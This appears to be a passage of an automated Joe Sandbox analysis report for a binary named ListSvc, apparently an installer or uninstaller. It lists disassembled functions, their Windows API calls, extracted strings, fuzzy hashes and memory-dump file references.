Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: MessageSendWindow$ProcessThread$CaptureUnicode
String ID:
API String ID: 1994056952-0
Opcode ID: 60d5d18c6536e8f3e7333ea3e87ccb02092badd8fb76314d68d3832b537e943d
Instruction ID: fa2d834c3aada0f77e9407d785ac3e39b975c7e98aa55159218471e4f58a832a
Opcode Fuzzy Hash: 60d5d18c6536e8f3e7333ea3e87ccb02092badd8fb76314d68d3832b537e943d
Instruction Fuzzy Hash: 3C21BFB520460A6F9A60EA99CD40EE777DCFF44744B105829B999C3642DE14F840C765

Uniqueness

Uniqueness Score: -1.00%

Function 00405F80, Relevance: 10.9, APIs: 7, Instructions: 406COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 833c993916d0d18284627c8ebcb851e0d3f6b00a19ef6d1fc725f28c20042ba8
Instruction ID: 5d66737b0d4da92f98c0db807105cf356bd4b4b1c4874a50b8b8aa415a59ee3b
Opcode Fuzzy Hash: 833c993916d0d18284627c8ebcb851e0d3f6b00a19ef6d1fc725f28c20042ba8
Instruction Fuzzy Hash: D1C134A2710A004BD714AB7D9C8476FB286DBC5324F19823FE645EB3D6DA7CCC558B88

Uniqueness

Uniqueness Score: -1.00%

Function 006158C4, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 239windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00615941
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00615968
SetForegroundWindow.USER32(?,00000000,00615C40,?,00000000,00615C7E), ref: 00615979
DefWindowProcW.USER32(00000000,?,?,?,00000000,00615C40,?,00000000,00615C7E), ref: 00615C2B

Strings

,hm, xrefs: 00615AA9, 00615AF3
Cannot evaluate variable because [Code] isn't running yet, xrefs: 00615AB3

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: MessagePostWindow$ForegroundProc
String ID: ,hm$Cannot evaluate variable because [Code] isn't running yet
API String ID: 602442252-4088602279
Opcode ID: 035c484aa870e85df39017a6846f67cb24ba4c1d627fefdd11be8a5083181655
Instruction ID: a4d9e41ba68ff62660f6698438dd6fdd69331843db6522f8d42236939986de27
Opcode Fuzzy Hash: 035c484aa870e85df39017a6846f67cb24ba4c1d627fefdd11be8a5083181655
Instruction Fuzzy Hash: F691BC34A04704EFD711DF69D8A1F99FBB6EB89700F19C4AAF8059B7A1C634AD80CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0060D8B0, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 216COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0060D996

Strings

NUL, xrefs: 0060DA59
WININIT.INI, xrefs: 0060D944
MoveFileEx, xrefs: 0060DBA0
[rename], xrefs: 0060D9FA, 0060DA36
.tmp, xrefs: 0060D952

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
API String ID: 390214022-3304407042
Opcode ID: 1516e58ba1303ba12e62d3941270339ebbfe120b0d1e0e5f83981064806d38df
Instruction ID: 9ccae61fee5444c96898e798bd08ad00ad1f0a42c005b5ee0ec7678d9f590d11
Opcode Fuzzy Hash: 1516e58ba1303ba12e62d3941270339ebbfe120b0d1e0e5f83981064806d38df
Instruction Fuzzy Hash: 3E810974A44209AFDB04EBE5C882BDEBBB6EF88304F504669E400B73D1E775AE45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00408E18, Relevance: 10.6, APIs: 7, Instructions: 130threadCOMMON

Download Yara Rule

APIs

Part of subcall function 004092D8: GetCurrentThreadId.KERNEL32 ref: 004092DB

GetTickCount.KERNEL32 ref: 00408E4F
GetTickCount.KERNEL32 ref: 00408E67
GetCurrentThreadId.KERNEL32 ref: 00408E96
GetTickCount.KERNEL32 ref: 00408EC1
GetTickCount.KERNEL32 ref: 00408EF8
GetTickCount.KERNEL32 ref: 00408F22
GetCurrentThreadId.KERNEL32 ref: 00408F92

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: CountTick$CurrentThread
String ID:
API String ID: 3968769311-0
Opcode ID: 20bc9faa338205b9676b9ce63f6a6fc95d4e340ef3c4d15d54fbfb65282f0910
Instruction ID: 216a2c916ba6e2f13aacbc2b486a5202febe2ca6ab096472d485461ede499aa8
Opcode Fuzzy Hash: 20bc9faa338205b9676b9ce63f6a6fc95d4e340ef3c4d15d54fbfb65282f0910
Instruction Fuzzy Hash: FD4171712087429ED721AF78CA4031FBAD2AF94354F15897EE4D9D72C2DB7C9881874A

Uniqueness

Uniqueness Score: -1.00%

Function 006A5F04, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 72fileCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F30
GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F49
CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F73
CloseHandle.KERNEL32(00000000), ref: 006A5F91

Strings

GetFinalPathNameByHandleW, xrefs: 006A5F26
kernel32.dll, xrefs: 006A5F2B

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: FileHandle$AttributesCloseCreateModule
String ID: GetFinalPathNameByHandleW$kernel32.dll
API String ID: 791737717-340263132
Opcode ID: ee2239582e227f58055d6c75fc8972661dcf133dd665b7ba8432f605ab2c3931
Instruction ID: 33e75e3eedf917459a19461fb92274fc6dcf6f547d9e1cd84d4496d1484fa6be
Opcode Fuzzy Hash: ee2239582e227f58055d6c75fc8972661dcf133dd665b7ba8432f605ab2c3931
Instruction Fuzzy Hash: FD110860740B043FE530B17A5C8BFBB204E8B96769F14013ABB1ADA3C2E9799D410D9A

Uniqueness

Uniqueness Score: -1.00%

Function 00408BB4, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00408BC9
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408BCF
GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 00408BEB

Strings

kernel32.dll, xrefs: 00408BC4
@, xrefs: 00408C69
GetLogicalProcessorInformation, xrefs: 00408BBF

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: @$GetLogicalProcessorInformation$kernel32.dll
API String ID: 4275029093-79381301
Opcode ID: d2b5bb259a4a67909b9857f382d53dc443368d34a06db9e148c60c099e14fc22
Instruction ID: fae384035c4cbf403bb6e842233c038de7d928fc1d1ef8a2a4529768a9174d83
Opcode Fuzzy Hash: d2b5bb259a4a67909b9857f382d53dc443368d34a06db9e148c60c099e14fc22
Instruction Fuzzy Hash: E4117570D05208AEEF10EBA5DA45A6EB7F4DB44704F1084BFE454B72C1DF7D8A548B29

Uniqueness

Uniqueness Score: -1.00%

Function 006B8141, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0060F6D8: GetCurrentProcess.KERNEL32(00000028), ref: 0060F6E8
Part of subcall function 0060F6D8: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0060F6EE

SetForegroundWindow.USER32(?), ref: 006B817A

Strings

Not restarting Windows because Uninstall is being run from the debugger., xrefs: 006B81B1
Restarting Windows., xrefs: 006B8151
bm, xrefs: 006B8147
%hm, xrefs: 006B815B
(\m, xrefs: 006B8183, 006B8194

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: Process$CurrentForegroundOpenTokenWindow
String ID: %hm$(\m$Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.$bm
API String ID: 3179053593-36556386
Opcode ID: b7594902ceb65011b7cd408ddb31800c32ac1c1d22a90f0235b323c67c5cc1dc
Instruction ID: d1bb377931262cf507ba46983c8bd46f5a1d5c2f393bef5d4bb5aec732555b7a
Opcode Fuzzy Hash: b7594902ceb65011b7cd408ddb31800c32ac1c1d22a90f0235b323c67c5cc1dc
Instruction Fuzzy Hash: 621130746042049FD700EB69DD86FE837EAAB49304F5540BAF401AB7A2CE79AC82C759

Uniqueness

Uniqueness Score: -1.00%

Function 00409E60, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0

Strings

Error, xrefs: 00409ED2
Runtime error at 00000000, xrefs: 00409E92, 00409ED7

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: FileHandleWrite
String ID: Error$Runtime error at 00000000
API String ID: 3320372497-2970929446
Opcode ID: a4deac2aa97ac97823855fef04cac89a22f23a0563f87e50a6800a30aeefe081
Instruction ID: a01582976990e38fcf300ac2ca1e4f1bd102d55210953f65d1fcb3aa769fb624
Opcode Fuzzy Hash: a4deac2aa97ac97823855fef04cac89a22f23a0563f87e50a6800a30aeefe081
Instruction Fuzzy Hash: 52F04FA0A44780BAEB10B7A19C07F7B261AD741B28F10567FB214B91D3C6B85CC49AE9

Uniqueness

Uniqueness Score: -1.00%

Function 0043171C, Relevance: 9.1, APIs: 6, Instructions: 144COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004317D1
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004317ED
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00431826
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004318A3
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004318BC
VariantCopy.OLEAUT32(?,?), ref: 004318F7

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: 040e7940f355aaa7652d1378d9b08393b08e43244b2170bcb39dc03bfc7fe70c
Instruction ID: ede279f2d9249a03c5eeb803d5e3445196a0ad83b08d93498a0369a0c14e8414
Opcode Fuzzy Hash: 040e7940f355aaa7652d1378d9b08393b08e43244b2170bcb39dc03bfc7fe70c
Instruction Fuzzy Hash: 41512D75A002299FCB62DB59CD81BD9B3FCAF0C304F4455EAE508E7212D634AF858F58

Uniqueness

Uniqueness Score: -1.00%

Function 006AE6F8, Relevance: 9.1, APIs: 6, Instructions: 66COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 006AE714
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,006B78BD,00000000,006B81F9), ref: 006AE743
GetWindowLongW.USER32(?,000000EC), ref: 006AE758
SetWindowLongW.USER32 ref: 006AE77F
ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 006AE798
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 006AE7B9

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: Window$Long$Show
String ID:
API String ID: 3609083571-0
Opcode ID: 5cdc2a2f03025ac3e3b3afbb97f1bf29b70dcad7f16aa9e547f2343e461a08eb
Instruction ID: c5f2d3f14be40374ea6ae40072baf741f42d7864aa45c80e1917733d0618a2ec
Opcode Fuzzy Hash: 5cdc2a2f03025ac3e3b3afbb97f1bf29b70dcad7f16aa9e547f2343e461a08eb
Instruction Fuzzy Hash: FC111C75745200AFD700EB68DD81FE237EAAB9E314F4541A5F6158F3E2CA65EC40DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00405A04, Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405ABB
Sleep.KERNEL32(0000000A,00000000,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405AD1
Sleep.KERNEL32(00000000,00000000,?,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405AFF
Sleep.KERNEL32(0000000A,00000000,00000000,?,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405B15

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d5c76b6411e5b1297fee21c622a9732816c4700a6e5391fd7fe9993b0e9394e2
Instruction ID: 7a051e160dd760b70f5de690832b1da94a718f6c47d0b95a7d4eebd5f387ad29
Opcode Fuzzy Hash: d5c76b6411e5b1297fee21c622a9732816c4700a6e5391fd7fe9993b0e9394e2
Instruction Fuzzy Hash: BCC1F272601B118BDB15CF69E884B27BBA2EB85310F18827FD4599F3D5C7B4A841CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0060D3B4, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 105fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4A1
CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4B1

Strings

Gtk, xrefs: 0060D412, 0060D41D
_iu, xrefs: 0060D443
.tmp, xrefs: 0060D455

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID: .tmp$Gtk$_iu
API String ID: 3498533004-1320520068
Opcode ID: 8f4bd8aeb1207aa4b07bf03847036b0a2b10865cd30baef83bcbefd08e77ff22
Instruction ID: 38fd5bd3aef28e796ac18a57f9f91bd27b67d48edde35eb58a18837c564f9665
Opcode Fuzzy Hash: 8f4bd8aeb1207aa4b07bf03847036b0a2b10865cd30baef83bcbefd08e77ff22
Instruction Fuzzy Hash: 73319030E80209ABDB14EBE4C842BDEBBB5AF54308F118169E904B73D1D738AE458B55

Uniqueness

Uniqueness Score: -1.00%

Function 006B8998, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 102COMMON

Download Yara Rule

APIs

Part of subcall function 005B8250: SetWindowTextW.USER32(?,00000000), ref: 005B8281

ShowWindow.USER32(?,00000005,00000000,006B8C4E,?,?,00000000), ref: 006B89DE

Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F

Part of subcall function 00424020: SetCurrentDirectoryW.KERNEL32(00000000,?,006B8A06,00000000,006B8C15,?,?,00000005,00000000,006B8C4E,?,?,00000000), ref: 0042402B

Part of subcall function 005C6FB0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005C7045,?,?,?,00000001,?,0061037E,00000000,006103E9), ref: 005C6FE5

Strings

Uninstall, xrefs: 006B89C4
.msg, xrefs: 006B8A44
IMsg, xrefs: 006B8AB2
.dat, xrefs: 006B8A25

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
